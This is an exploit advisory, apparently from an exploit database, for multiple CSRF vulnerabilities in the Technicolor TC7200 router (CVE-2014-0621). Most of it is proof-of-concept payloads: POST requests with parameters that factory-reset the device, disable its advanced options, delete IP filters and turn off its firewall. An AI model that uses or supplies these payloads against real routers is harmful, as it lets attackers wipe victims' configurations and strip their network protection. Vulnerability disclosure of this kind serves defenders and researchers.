# Exploit Title: Technicolor TC7200 - Multiple CSRF Vulnerabilities
# Google Dork: N/A
# Date: 02-01-2013
# Exploit Author: Jeroen - IT Nerdbox
# Vendor Homepage:
# Software Link: N/A
# Version: STD6.01.12
# Tested on: N/A
# CVE : CVE-2014-0621
# Proof of Concept:
## Payload for Factory Reset:
# POST : http://<ip>/goform/system/factory
# Parameter: None
## Payload to disable the advanced options:
# POST : http://<ip>/goform/advanced/options
# Parameter: None
## Payload to remove ip-filters:
# POST : http://<ip>//goform/advanced/ip-filters
# Parameter: IpFilterAddressDelete1 = 1
## Payload to remove firewall settings
# POST : http://<ip>/goform/advanced/firewall
# Parameter: cbFirewall = 1
# Check out the video at: http://www.nerdbox.it/technicolor-tc7200-multiple-csrf-vulnerabilities/